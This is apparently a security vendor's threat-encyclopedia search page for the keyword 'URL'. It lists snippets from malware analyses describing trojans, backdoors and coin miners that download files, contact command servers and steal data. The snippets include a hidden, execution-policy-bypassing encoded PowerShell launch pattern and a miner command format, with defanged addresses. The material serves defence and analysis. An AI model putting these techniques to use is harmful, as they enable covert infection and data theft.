Search
Keyword: URL
" -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand {Base64 encoded powershell command} The base64 encoded powershell command is used to connect to the following URL to download a string
files in all drives Connect to a website to check IP address Gather information of affected computer Send information gathered to a specific URL It locks the screen and displays the following image:
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It downloads a file from a certain URL then renames it
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It downloads a file from a certain URL then renames it
), Windows Server 2008, and Windows Server 2012.) NOTES: It appends pdf=FUQiFYcM to the URL to download the decoy PDF. JS/Nemucod.h (McAfee), Troj/JSDldr-BW (Sophos), Trojan-Downloader.JS.Agent.hhi
}report.com/images/2009/05/naughty-elephant.jpg It then saves and open it as follows: %Current Folder%\{Malware Name}.jpg This is done to trick users into thinking that the executed file is legitimate. It then connects to the following URL to
execution. NOTES: This backdoor connects to the URL http://www.msn.com . a variant of Win32/Injector.BBMB trojan(NOD32),Troj/Agent-AGRG(SOPHOS_LITE)
visiting malicious sites. Download Routine This Trojan downloads the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}chingsolution.com/images/tere2611.exe
bypass, it downloads its shell code as logo.gif . The URL where it downloads its shell code is the same as where this malware is uploaded. Troj/SwfExp-CM (Sophos), Exploit:SWF/ShellCode.U (Microsoft)
its installation routine: HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Main TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del
Server 2008, and Windows Server 2012.) NOTES: It connects the following URL to download data related to GeoIP https://www.{BLOCKED}d.com/en/locate-my-ip-address The downloaded data should not contain any
server safe_mode status web host URL web host server address remote user server address Stolen Information This backdoor sends the data it gathers to the following email addresses via SMTP: {BLOCKED
the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}5.{BLOCKED}3.com/tj.asp?time=20160101160935&mac=00-00-00-00-00-00&username=blog_folder&content
the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}ek.co.uk/system/logs/98yt It saves the files it downloads using the following names: %User Temp%
String2 any of the following filename of the files found on %User Temp% It attempts to connect to an unknown malicious site. However, URL is not specified. (Note: %User Temp% is the current user's Temp
{Server}/r Other Details This Backdoor does the following: This backdoor checks for the connection to the following URL to choose which C2 server to send and receive information: http://{BLOCKED}.{BLOCKED
following: Connects to the following URL for coinmining activities: bit.p{BLOCKED}.com Format of the executed command -v {algorithm} -o {CnC} -u {username} -p {password} -t {number of CPU threads}
Copy files and directories Move a directory or a file Create a new directory Change timestamps of a file or directory Download a file from a URL Execute a process and capture its output Connect to a SQL
remote URL where a copy of the worm may be downloaded. It may also post similar content to Facebook wall. In order to accomplish its malicious routines, it downloads a configuration file from any of the
\ Search Assistant DefaultSearchURL = "http://www.{BLOCKED}l.co.uk/index.php?page=search/web&search=" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Internet Explorer\SearchScopes URL = "http://www.{BLOCKED